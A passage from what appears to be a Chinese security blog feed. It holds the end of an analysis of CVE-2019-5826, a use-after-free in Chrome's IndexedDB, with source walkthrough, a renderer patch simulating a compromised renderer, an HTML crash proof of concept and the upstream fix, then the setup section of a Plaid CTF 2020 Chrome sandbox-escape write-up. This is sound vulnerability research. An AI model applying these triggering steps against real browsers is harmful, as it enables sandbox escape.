该连接将在数据库中被重置</span></span><br><span class="line">        db_-&gt;<span class="built_in">RequestComplete</span>(<span class="keyword">this</span>);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 如果当前connection不是最后一个要处理的连接，则不会执行到StartUpgrade创建新连接。</span></span><br><span class="line">    <span class="keyword">if</span> (!db_-&gt;connections_.<span class="built_in">empty</span>())</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">StartUpgrade</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>如果当前连接类型不为<code>pending connection</code>，即<strong>该连接并非被过早关闭</strong>（即正常情况，正常情况是比异常情况更容易触发的），并且<strong>当前连接为connections_中的最后一个连接</strong>。则该函数会执行<a href="https://source.chromium.org/chromium/chromium/src/+/refs/tags/73.0.3683.75:content/browser/indexed_db/indexed_db_database.cc;l=243">StartUpgrade</a>函数，<code>StartUpgrade</code>函数内部会使得IndexedDBDatabase<strong>创建一个新的pending connection至connections_列表中</strong>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Initiate the upgrade. The bulk of the work actually happens in</span></span><br><span class="line"><span class="comment">// IndexedDBDatabase::VersionChangeOperation in order to kick the</span></span><br><span class="line"><span class="comment">// transaction into the correct state.</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">StartUpgrade</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 使数据库创建一个新的连接</span></span><br><span class="line">    connection_ = db_-&gt;<span class="built_in">CreateConnection</span>(pending_-&gt;database_callbacks,</span><br><span class="line">                                        pending_-&gt;child_process_id);</span><br><span class="line">    <span class="built_in">DCHECK_EQ</span>(db_-&gt;connections_.<span class="built_in">count</span>(connection_.<span class="built_in">get</span>()), <span class="number">1UL</span>);</span><br><span class="line"></span><br><span class="line">    std::vector&lt;<span class="type">int64_t</span>&gt; object_store_ids;</span><br><span class="line"></span><br><span class="line">    IndexedDBTransaction* transaction = connection_-&gt;<span class="built_in">CreateTransaction</span>(</span><br><span class="line">        pending_-&gt;transaction_id,</span><br><span class="line">        std::<span class="built_in">set</span>&lt;<span class="type">int64_t</span>&gt;(object_store_ids.<span class="built_in">begin</span>(), object_store_ids.<span class="built_in">end</span>()),</span><br><span class="line">        blink::mojom::IDBTransactionMode::VersionChange,</span><br><span class="line">        <span class="keyword">new</span> IndexedDBBackingStore::<span class="built_in">Transaction</span>(db_-&gt;<span class="built_in">backing_store</span>()));</span><br><span class="line">    db_-&gt;<span class="built_in">RegisterAndScheduleTransaction</span>(transaction);</span><br><span class="line"></span><br><span class="line">    transaction-&gt;<span class="built_in">ScheduleTask</span>(</span><br><span class="line">        base::<span class="built_in">BindOnce</span>(&amp;IndexedDBDatabase::VersionChangeOperation, db_,</span><br><span class="line">                       pending_-&gt;version, pending_-&gt;callbacks));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>这样，<code>connections_</code>集合元素将不为0。当控制流从<code>OnConnectionClosed</code>函数返回时，便无法通过下面的判断。这样，就无法执行<code>factory_-&gt;ReleaseDatabase</code>。</p><blockquote><p>预期情况是，当最后一个连接被erase后，一定进入下面的if语句以执行<code>factory_-&gt;ReleaseDatabase</code>，但在这里显然是一个非预期情况。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBDatabase::Close</span><span class="params">(IndexedDBConnection* connection, <span class="type">bool</span> forced)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">if</span> (active_request_)</span><br><span class="line">    active_request_-&gt;<span class="built_in">OnConnectionClosed</span>(connection);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// 如果当前数据库中的所有连接和所有请求均已经全部释放完成，则从IndexDBFactory类实例中删除指向当前IndexedDBData的指针</span></span><br><span class="line">  <span class="keyword">if</span> (connections_.<span class="built_in">empty</span>() &amp;&amp; !active_request_ &amp;&amp; pending_requests_.<span class="built_in">empty</span>()) &#123;</span><br><span class="line">    backing_store_ = <span class="literal">nullptr</span>;</span><br><span class="line">    factory_-&gt;<span class="built_in">ReleaseDatabase</span>(identifier_, forced);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>而<code>factory_-&gt;ReleaseDatabase</code>函数会将<strong>指向当前数据库的原始指针</strong>从<code>database_map_</code>中删除，也就是说，若<code>IndexedDBFactoryImpl::ReleaseDatabase</code>不被执行，则<strong>该原始指针就一直保存在<code>database_map_</code>中</strong>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBFactoryImpl::ReleaseDatabase</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">const</span> IndexedDBDatabase::Identifier&amp; identifier,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">bool</span> forced_close)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK</span>(!database_map_.<span class="built_in">find</span>(identifier)-&gt;second-&gt;<span class="built_in">backing_store</span>());</span><br><span class="line">  <span class="comment">// 将当前IndexedDatabase原始指针从database_map中删除</span></span><br><span class="line">  <span class="built_in">RemoveDatabaseFromMaps</span>(identifier);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// No grace period on a forced-close, as the initiator is</span></span><br><span class="line">  <span class="comment">// assuming the backing store will be released once all</span></span><br><span class="line">  <span class="comment">// connections are closed.</span></span><br><span class="line">  <span class="built_in">ReleaseBackingStore</span>(identifier.first, forced_close);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>最终，<code>database_map_</code>中保留的<strong>原始指针并没有被删除</strong>。</p></li><li><p>同时，当控制流返回<code>IndexedDBDatabase::ForceClose</code>函数时，由于<code>connections_</code>集合既执行了<code>erase</code>函数，又执行了<code>insert</code>函数，因此在下一次判断循环条件<code>it != connections_.end()</code>时，<code>connection_</code>集合中仍然存在connection（尽管此时的连接非彼时的连接），<strong>connection_集合的元素个数将保持不变</strong>。</p><p>而<code>end</code>函数返回的是<code>list</code>的迭代器，<strong>所以返回的<code>end</code>迭代器将保证不变</strong>，而<code>it++</code>，因此将跳出该循环，结束<strong>连接的终止操作</strong>。</p><p>但最重要的是，<code>IndexedDBFactoryImpl::database_map</code>中<strong>仍然保留指向当前数据库的原始指针</strong>。该指针本应该在当前循环执行结束时被移除，但这里却没有被移除。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBDatabase::ForceClose</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">auto</span> it = connections_.<span class="built_in">begin</span>();</span><br><span class="line">  <span class="keyword">while</span> (it != connections_.<span class="built_in">end</span>()) &#123;</span><br><span class="line">    IndexedDBConnection* connection = *it++;</span><br><span class="line">    <span class="comment">// 注意这一步，执行`connection-&gt;ForceClose()`时，程序会关闭当前连接。</span></span><br><span class="line">    <span class="comment">// 但倘若当前遍历的连接是connection_中的最后一条连接，则会执行函数StartUpgrade以建立新连接</span></span><br><span class="line">    connection-&gt;<span class="built_in">ForceClose</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>现在，我们可以成功将指向当前<code>IndexedDatabase</code>的一个原始指针保存至<strong>本不该保存的地方</strong>(指<code>database_map</code>)。而我们下一步要做的就是尝试将当前<code>IndexedDatabase</code>所使用的内存释放。</p></li></ul><h4 id="b-释放IndexedDB内存">b. 释放IndexedDB内存</h4><ul><li><p>IndexedDBDatabase对象是一种<strong>引用计数（Reference counted）的对象</strong>。 针对该对象的计数引用被保存在IndexedDBConnection对象、IndexedDBTransaction对象或其他正在进行或待处理的请求对象中。 一旦引用计数降至0，会立即释放对象。（以免忘记，这段又重复了一遍）</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">CONTENT_EXPORT</span> IndexedDBConnection &#123;</span><br><span class="line"> <span class="comment">// ...</span></span><br><span class="line">  <span class="comment">// NULL in some unit tests, and after the connection is closed.</span></span><br><span class="line">  scoped_refptr&lt;IndexedDBDatabase&gt; database_;</span><br><span class="line"> <span class="comment">// ...</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">CONTENT_EXPORT</span> IndexedDBTransaction &#123;</span><br><span class="line"> <span class="comment">// ...</span></span><br><span class="line">  scoped_refptr&lt;IndexedDBDatabase&gt; database_;</span><br><span class="line"> <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>也就是说，一旦我们将所有与当前IndexedDBDatabase对象相关的Connection和Transaction对象全部释放，那么当前IndexedDBDatabase就会因为引用计数为0而自动释放。</p></li><li><p>Issue941746给出了一种方法 —— 通过调用<code>IndexedDBFactoryImpl::AbortTransactionsForDatabase</code>来释放IndexedDBDatabase对象。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 函数调用call</span></span><br><span class="line">content::IndexedDBFactoryImpl::AbortTransactionsForDatabase</span><br><span class="line">  content::IndexedDBFactoryImpl::AbortTransactions                 <span class="comment">// 循环对所有IndexedDatabase执行AbortAllTransactionsForConnections</span></span><br><span class="line">    content::IndexedDBDatabase::AbortAllTransactionsForConnections <span class="comment">// 循环对所有Connection执行FinishAllTransactions</span></span><br><span class="line">      content::IndexedDBConnection::FinishAllTransactions          <span class="comment">// 循环对所有Transactions执行Abort</span></span><br><span class="line">        content::IndexedDBTransaction::Abort</span><br><span class="line">          content::IndexedDBConnection::RemoveTransaction          <span class="comment">// 释放Transaction</span></span><br><span class="line">          content::IndexedDBDatabase::TransactionFinished          <span class="comment">// 释放Connection</span></span><br></pre></td></tr></table></figure><p>执行<code>AbortTransactionsForDatabase</code>函数将会释放所有的<code>IndexedDBConnection</code>以及<code>IndexedDBTransaction</code>，进而释放<code>IndexedDatabase</code>对象，如此就能达到我们想要释放某个IndexedDatabase对象的目的。</p><blockquote><p>这里贴出IndexedDBTransaction::Abort函数的关键代码。<strong>请注意函数内部的注释</strong>。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBTransaction::Abort</span><span class="params">(<span class="type">const</span> IndexedDBDatabaseError&amp; error)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  database_-&gt;<span class="built_in">TransactionFinished</span>(<span class="keyword">this</span>, <span class="literal">false</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// RemoveTransaction will delete |this|.</span></span><br><span class="line">  <span class="comment">// Note: During force-close situations, the connection can be destroyed during</span></span><br><span class="line">  <span class="comment">// the |IndexedDBDatabase::TransactionFinished| call</span></span><br><span class="line">  <span class="comment">// 上面这段注释表示，在`force_close = true`的前提下，执行该函数将会释放connection以及trasaction</span></span><br><span class="line">  <span class="keyword">if</span> (connection_)</span><br><span class="line">    connection_-&gt;<span class="built_in">RemoveTransaction</span>(id_);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h4 id="c-如何触发UAF">c. 如何触发UAF</h4><ul><li><p>根据上面的分析，我们可以得出，当顺序调用这三个函数时，我们便可以成功使<code>database_map</code>中保存一个指向已被释放内存的悬垂指针。</p><ul><li><code>Open(db1)</code></li><li><code>DeleteDatabase(db1, force_close=True)</code></li><li><code>AbortTransactionsForDatabase</code></li></ul></li><li><p>之后，我们只需通过Heap Spray将这块被释放的内存重新分配回来即可利用。</p></li><li><p>但这里有个问题，如何在render进程中通过IndexedDBFactory来调用这三个函数呢？实际上，render的JS接口可以调用IndexedDB的<code>open</code>和<code>deleteDatabase</code>，但无法调用<code>AbortTransactionsForDatabase</code>接口。同时，这里存在一个问题，<strong>我们无法保证browser进程中的函数执行顺序如我们所期待的那样</strong>，因为Js中IndexedDB接口大多都是<strong>异步</strong>的，因此browser中的这三个函数可能无法依次、完全的完成执行。</p></li><li><p>但我们又必须在render进程中依次同步执行这三个函数，而这就是为什么<strong>该漏洞只能在<code>render RCE</code>的基础上利用</strong>的原因了。</p><p>由于 <strong><code>render RCE</code>可以给render进程自己打上patch</strong>，所以就可以在render进程中打patch<strong>以保证这三个函数可以被同步调用</strong>（即依次执行）。</p><blockquote><p>这也是为什么在<strong>环境搭建</strong>时要在chrome源码中打上patch的原因，因为手动打上patch可以模拟render RCE 打patch的结果。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// third_party/blink/renderer/modules/indexeddb/web_idb_factory_impl.cc</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">WebIDBFactoryImpl::Open</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">       std::make_unique&lt;IndexedDBDatabaseCallbacksImpl&gt;(</span></span></span><br><span class="line"><span class="params"><span class="function">           base::WrapUnique(database_callbacks));</span></span></span><br><span class="line"><span class="params"><span class="function">   DCHECK(!name.IsNull());</span></span></span><br><span class="line"><span class="params"><span class="function">   factory_-&gt;Open(GetCallbacksProxy(std::move(callbacks_impl)),</span></span></span><br><span class="line"><span class="params"><span class="function">                  GetDatabaseCallbacksProxy(std::move(database_callbacks_impl)),</span></span></span><br><span class="line"><span class="params"><span class="function">                  name, version, transaction_id);</span></span></span><br><span class="line"><span class="params"><span class="function">+  <span class="keyword">if</span> (version == <span class="number">3</span>) &#123;</span></span></span><br><span class="line"><span class="params"><span class="function">+    mojom::blink::IDBCallbacksAssociatedPtrInfo ptr_info;</span></span></span><br><span class="line"><span class="params"><span class="function">+    <span class="keyword">auto</span> request = mojo::MakeRequest(&amp;ptr_info);</span></span></span><br><span class="line"><span class="params"><span class="function">+    factory_-&gt;DeleteDatabase(std::move(ptr_info), origin, name, <span class="literal">true</span>);</span></span></span><br><span class="line"><span class="params"><span class="function">+    factory_-&gt;AbortTransactionsForDatabase(origin, base::OnceCallback&lt;<span class="type">void</span>(blink::mojom::IDBStatus)&gt;());</span></span></span><br><span class="line"><span class="params"><span class="function">+  &#125;</span></span></span><br><span class="line"><span class="params"><span class="function"> &#125;</span></span></span><br></pre></td></tr></table></figure></li></ul><h4 id="d-POC">d. POC</h4><p>笔者在<code>issue 941746</code>提供的poc上做了一点修改，新构造的POC删除了无用的语句，并使Chrome触发Crash</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">&quot;text/javascript&quot;</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">poc</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">/*</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">                在chrome进程中依次同步执行open、deleteDatabase以及AbortTransactionsForDatabase函数</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">                执行完成后将会产生一个悬垂指针</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">            */</span></span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">await</span> <span class="variable language_">window</span>.<span class="property">indexedDB</span>.<span class="title function_">open</span>(<span class="string">&quot;db1&quot;</span>, <span class="number">3</span>);</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// 尝试使用这个悬垂指针，应该会造成crash</span></span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">window</span>.<span class="property">indexedDB</span>.<span class="title function_">deleteDatabase</span>(<span class="string">&quot;db1&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">&quot;poc()&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure><p>Chrome成功crash</p><p><img src="/2020/10/CVE-2019-5826/crash.png" alt="img"></p><blockquote><p>图中多输出的<code>nice</code>，为chrome打patch时多添加的一条printf语句</p><p>该语句的输出表示patch部分代码被执行。</p></blockquote><h3 id="4-后记">4. 后记</h3><p>以下是chrome团队修复后的代码。该<a href="https://chromium.googlesource.com/chromium/src.git/+/eaf2e8bce3855d362e53034bd83f0e3aff8714e4%5E%21/">patch</a>彻彻底底将<code>connections_</code>集合中的所有连接全部关闭。patch前的代码依赖<strong>迭代器</strong>来判断是否全部关闭所有连接，而patch后的代码使用集合元素个数来进行判断，某种程度上使得代码更加安全。</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@@ -1949,10 +1949,10 @@</span></span><br><span class="line">     request-&gt;AbortForForceClose();</span><br><span class="line">   &#125;</span><br><span class="line"></span><br><span class="line"><span class="deletion">-  auto it = connections_.begin();</span></span><br><span class="line"><span class="deletion">-  while (it != connections_.end()) &#123;</span></span><br><span class="line"><span class="deletion">-    IndexedDBConnection* connection = *it++;</span></span><br><span class="line"><span class="addition">+  while (!connections_.empty()) &#123;</span></span><br><span class="line"><span class="addition">+    IndexedDBConnection* connection = *connections_.begin();</span></span><br><span class="line">     connection-&gt;ForceClose();</span><br><span class="line"><span class="addition">+    connections_.erase(connection);</span></span><br><span class="line">   &#125;</span><br><span class="line">   DCHECK(connections_.empty());</span><br><span class="line">   DCHECK(!active_request_);</span><br></pre></td></tr></table></figure><h2 id="四、参考">四、参考</h2><ul><li><p><a href="https://www.blackhat.com/us-19/briefings/schedule/index.html#the-most-secure-browser-pwning-chrome-from--to--16274">The Most Secure Browser? Pwning Chrome from 2016 to 2019</a></p><ul><li><a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Feng-The-Most-Secure-Browser-Pwning-Chrome-From-2016-To-2019.pdf">Presentation Slides</a></li><li><a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Feng-The-Most-Secure-Browser-Pwning-Chrome-From-2016-To-2019-wp.pdf">White Paper</a>（<strong>相当有用</strong>）</li></ul></li><li><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-5826">NVD - CVE-2019-5826 Dtail</a></p></li><li><p><a href="https://crbug.com/941746">Chrome Issue 941746: Security: UAF in content::IndexedDBDatabase</a></p></li><li><p><a href="https://www.anquanke.com/post/id/183809#h3-3">通过IndexedDB条件竞争实现Chrome沙箱逃逸（上）</a></p><blockquote><p>该文章<strong>并没有涉及</strong>我们当前所研究的UAF漏洞，但即便如此，它仍然提供了一些关于<code>IndexedDB</code>相关的说明。</p></blockquote></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;CVE-2019-5826是Google Chrome里IndexedDB中的Use-after-free漏洞，在版本73.0.3683.86之前该漏洞允许攻击者通过&lt;strong&gt;搭配render的RCE漏洞&lt;/strong&gt;来造成UAF并&lt;strong&gt;沙箱逃逸&lt;/strong&gt;。&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    <category term="chrome" scheme="https://kiprey.github.io/categories/vulnerability-analysis/chrome/"/>
    
    
    <category term="chrome" scheme="https://kiprey.github.io/tags/chrome/"/>
    
  </entry>
  
  <entry>
    <title>Plaid CTF 2020 mojo Writeup</title>
    <link href="https://kiprey.github.io/2020/10/mojo/"/>
    <id>https://kiprey.github.io/2020/10/mojo/</id>
    <published>2020-10-03T07:20:22.000Z</published>
    <updated>2025-11-24T03:59:40.049Z</updated>
    
    <content type="html"><![CDATA[<h2 id="1-简介">1. 简介</h2><p>Plaid CTF 2020 <code>mojo</code> 是 chromium sandbox escape 沙箱逃逸的一道基础题，适合用于<code>chrome</code>入门。</p><p>题目来源 - <a href="https://ctftime.org/task/11314">ctftime - task11314</a></p><span id="more"></span><h2 id="2-环境配置">2. 环境配置</h2><ul><li><p>由<code>dockerfile</code>中的命令可知，启动<code>chrome</code>的脚本为<code>visit.sh</code>。而该脚本的内容如下</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"><span class="built_in">timeout</span> 20 ./chrome --headless --disable-gpu --remote-debugging-port=1338 --enable-blink-features=MojoJS,MojoJSTest <span class="string">&quot;<span class="variable">$1</span>&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>由<code>visit.sh</code>中的命令可知，启动chrome的命令为</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./chrome --headless --disable-gpu --remote-debugging-port=1338 --enable-blink-features=MojoJS,MojoJSTest &lt;URL&gt;</span><br></pre></td></tr></table></figure><p>我们可以设置一个<code>--user-data-dir</code>参数来更加方便地使用<a href="https://chromedevtools.github.io/devtools-protocol/">DevTools</a></p><blockquote><p>加上这个参数后，最直观的作用就是执行JS代码时，<strong>所有的<code>console.log</code>输出都将会同步输出至终端</strong>。</p></blockquote><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">基础知识：将DevTools用作协议客户端</span><br><span class="line">开发人员工具前端可以连接到远程运行的Chrome实例进行调试。为了使这种情况起作用，您应该使用remote-debugging-port命令行开关启动主机Chrome实例：</span><br><span class="line"></span><br><span class="line">chrome.exe --remote-debugging-port= 9222</span><br><span class="line">然后，您可以使用不同的用户个人资料启动单独的客户端Chrome实例：</span><br><span class="line"></span><br><span class="line">chrome.exe --user-data-dir = &lt;someDir&gt;</span><br><span class="line">现在，您可以从客户端导航到给定的端口，并附加到任何已发现的选项卡以进行调试：http://localhost:9222</span><br></pre></td></tr></table></figure><p>即我们最后<strong>实际启动</strong>chrome的命令为</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./chrome --headless --disable-gpu --remote-debugging-port=1338 --user-data-dir=./userdata --enable-blink-features=MojoJS,MojoJSTest &lt;URL&gt;</span><br></pre></td></tr></table></figure><blockquote><p><code>--headless</code>：Chrome-headless 模式， Google 针对 Chrome 浏览器 59版 新增加的一种模式，可以让你不打开UI界面的情况下使用 Chrome 浏览器，所以运行效果与 Chrome 保持完美一致。使用该参数将不会启动chrome的GUI界面，如需启动GUI界面则需删除该参数。</p><p><code>--enable-blink-features</code>：启用一个或多个启用Blink内核运行时的功能。在这里启用了<code>MojoJS</code></p></blockquote></li><li><p>笔者第一次执行时会报错，提示<code>No usable sandbox</code>。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Kiprey @ Kipwn in /usr/class/CTFs/mojo/chrome [15:10:00] C:1</span></span><br><span class="line">$ ./chrome --headless --disable-gpu --remote-debugging-port=1338 --user-data-dir=./userdata --enable-blink-features=MojoJS test.html</span><br><span class="line">[1003/151007.365372:FATAL:zygote_host_impl_linux.cc(116)] No usable sandbox! Update your kernel or see https://chromium.googlesource.com/chromium/src/+/master/docs/linux/suid_sandbox_development.md <span class="keyword">for</span> more information on developing with the SUID sandbox. If you want to live dangerously and need an immediate workaround, you can try using --no-sandbox.</span><br><span class="line"><span class="comment">#0 0x560df69de579 base::debug::CollectStackTrace()</span></span><br><span class="line"><span class="comment">#1 0x560df69426f3 base::debug::StackTrace::StackTrace()</span></span><br><span class="line"><span class="comment">#2 0x560df6954475 logging::LogMessage::~LogMessage()</span></span><br><span class="line"><span class="comment">#3 0x560df824a22e service_manager::ZygoteHostImpl::Init()</span></span><br><span class="line"><span class="comment">#4 0x560df652ad37 content::ContentMainRunnerImpl::Initialize()</span></span><br><span class="line"><span class="comment">#5 0x560df657965a service_manager::Main()</span></span><br><span class="line"><span class="comment">#6 0x560df6529351 content::ContentMain()</span></span><br><span class="line"><span class="comment">#7 0x560df657849d headless::(anonymous namespace)::RunContentMain()</span></span><br><span class="line"><span class="comment">#8 0x560df657819b headless::HeadlessShellMain()</span></span><br><span class="line"><span class="comment">#9 0x560df3feac27 ChromeMain</span></span><br><span class="line"><span class="comment">#10 0x7f953511cbbb __libc_start_main</span></span><br><span class="line"><span class="comment">#11 0x560df3feaa6a _start</span></span><br><span class="line"></span><br><span class="line">Received signal 6</span><br><span class="line"><span class="comment">#0 0x560df69de579 base::debug::CollectStackTrace()</span></span><br><span class="line"><span class="comment">#1 0x560df69426f3 base::debug::StackTrace::StackTrace()</span></span><br><span class="line"><span class="comment">#2 0x560df69de120 base::debug::(anonymous namespace)::StackDumpSignalHandler()</span></span><br><span class="line"><span class="comment">#3 